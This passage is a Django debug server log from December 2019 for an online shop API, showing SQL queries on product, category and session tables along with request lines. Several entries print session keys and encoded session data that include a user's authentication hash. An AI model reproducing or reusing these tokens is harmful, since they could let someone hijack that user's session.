"shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:27:40] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 DEBUG 2019-12-16 09:29:55,046 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:29:55] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 DEBUG 2019-12-16 09:31:16,146 utils 20136 140506667599616 (0.004) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:31:16] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 DEBUG 2019-12-16 09:31:26,467 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:31:26] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 DEBUG 2019-12-16 09:31:33,039 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:31:33] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 DEBUG 2019-12-16 09:31:43,113 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:31:43] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 [16/Dec/2019 09:32:50] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 09:33:03,207 utils 20136 140506667599616 (0.004) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:33:03] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 DEBUG 2019-12-16 09:33:15,624 utils 20136 140506667599616 (0.004) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:33:15] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 DEBUG 2019-12-16 09:34:43,434 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:34:43] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 [16/Dec/2019 09:35:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 09:36:04,434 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:36:04] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 DEBUG 2019-12-16 09:36:11,029 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:36:11] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 DEBUG 2019-12-16 09:36:34,772 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:36:34] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 [16/Dec/2019 09:37:52] "GET / HTTP/1.0" 302 0 [16/Dec/2019 09:42:55] "GET / HTTP/1.0" 302 0 [16/Dec/2019 09:44:59] "GET / HTTP/1.0" 302 0 [16/Dec/2019 09:47:57] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [16/Dec/2019 09:48:47] "GET /robots.txt HTTP/1.0" 404 6624 [16/Dec/2019 09:48:48] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 09:52:29,059 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:52:29] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 DEBUG 2019-12-16 09:52:46,144 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 09:52:46,148 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) DEBUG 2019-12-16 09:52:46,155 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 09:52:46,158 utils 20136 140506667599616 (0.001) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T09:52:46.156187+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 9, 52, 46, 156187, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 09:52:46,181 utils 20136 140506667599616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-30T09:52:46.179624+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 30, 9, 52, 46, 179624, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [16/Dec/2019 09:52:46] "GET /api/v1/fire/ HTTP/1.0" 200 6618 Not Found: /favicon.ico [16/Dec/2019 09:52:46] "GET /favicon.ico HTTP/1.0" 404 6629 [16/Dec/2019 09:54:05] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 09:54:08,053 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:54:08] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 DEBUG 2019-12-16 09:54:22,584 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC; args=() [16/Dec/2019 09:54:22] "GET /api/v1/products/dust-clouds HTTP/1.0" 200 1083 [16/Dec/2019 09:55:06] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 09:55:09] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 09:57:46] "GET / HTTP/1.0" 302 0 [16/Dec/2019 09:59:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 10:00:46,008 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:00:46,012 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) DEBUG 2019-12-16 10:00:46,019 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:00:46,021 utils 20136 140506667599616 (0.001) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-16T10:00:46.020010+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 16, 10, 0, 46, 20010, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-16 10:00:46,042 utils 20136 140506667599616 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-30T10:00:46.041263+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 30, 10, 0, 46, 41263, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [16/Dec/2019 10:00:46] "GET /api/v1/fire/ HTTP/1.0" 200 6618 [16/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 [16/Dec/2019 10:10:06] "GET / HTTP/1.0" 302 0 [16/Dec/2019 10:11:10] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 10:11:15] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 10:12:36] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 10:15:08] "GET / HTTP/1.0" 302 0 [16/Dec/2019 10:17:46] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 10:17:50] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 10:20:11] "GET / HTTP/1.0" 302 0 [16/Dec/2019 10:21:26] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 10:21:39] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 Not Found: /api/v1/http://admin.resfx.com/api/v1/fire/ [16/Dec/2019 10:22:33] "GET /api/v1/http://admin.resfx.com/api/v1/fire/ HTTP/1.0" 404 7539 DEBUG 2019-12-16 10:22:57,733 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:22:57,737 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:22:57] "GET /api/v1/fire/ HTTP/1.0" 200 482 [16/Dec/2019 10:24:57] "OPTIONS /api/v1/fire HTTP/1.0" 301 0 [16/Dec/2019 10:25:13] "GET / HTTP/1.0" 302 0 [16/Dec/2019 10:25:15] "OPTIONS /api/v1/fire HTTP/1.0" 301 0 [16/Dec/2019 10:25:43] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 [16/Dec/2019 10:25:53] "OPTIONS /api/v1/fire/ HTTP/1.0" 200 181 DEBUG 2019-12-16 10:26:42,099 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:26:42,103 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:26:42] "GET /api/v1/fire/ HTTP/1.0" 200 482 [16/Dec/2019 10:28:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 10:28:08,462 utils 20136 140506667599616 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'en1smhfxjntix2fitju4m4mo54eb99tc' LIMIT 1; args=('en1smhfxjntix2fitju4m4mo54eb99tc',) DEBUG 2019-12-16 10:28:08,466 utils 20136 140506667599616 (0.003) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('en1smhfxjntix2fitju4m4mo54eb99tc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2019-12-30T10:28:08.463368+00:00'::timestamptz); args=('en1smhfxjntix2fitju4m4mo54eb99tc', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2019, 12, 30, 10, 28, 8, 463368, tzinfo=)) [16/Dec/2019 10:28:08] "GET /login/?next=/ HTTP/1.0" 200 1786 [16/Dec/2019 10:28:12] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [16/Dec/2019 10:28:12] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [16/Dec/2019 10:28:13] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [16/Dec/2019 10:28:13] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 DEBUG 2019-12-16 10:28:21,573 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:28:21,576 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:28:21] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 10:29:29,164 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:29:29,168 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:29:29] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 10:29:57,553 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:29:57,556 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:29:57] "GET /api/v1/fire/ HTTP/1.0" 200 482 [16/Dec/2019 10:30:16] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 10:30:21,425 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:30:21,430 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:30:21] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 10:31:29,807 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:31:29,811 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:31:29] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 10:31:39,820 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:31:39,826 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:31:39] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 10:32:35,306 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:32:35,310 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:32:35] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 10:34:04,714 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:34:04,718 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:34:04] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 10:34:35,232 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:34:35,236 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:34:35] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 10:35:37,790 utils 20136 140506667599616 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:35:37,794 utils 20136 140506667599616 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:35:37] "GET /api/v1/fire/ HTTP/1.0" 200 482 DEBUG 2019-12-16 10:37:56,038 utils 20136 140506667599616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:37:56,044 utils 20136 140506667599616 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [16/Dec/2019 10:37:56] "GET /api/v1/fire/ HTTP/1.0" 200 482 [16/Dec/2019 10:38:31] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-16 10:39:24,821 utils 20136 140506667599616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-16 10:39:24,825 utils 20136 140506667599616 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM 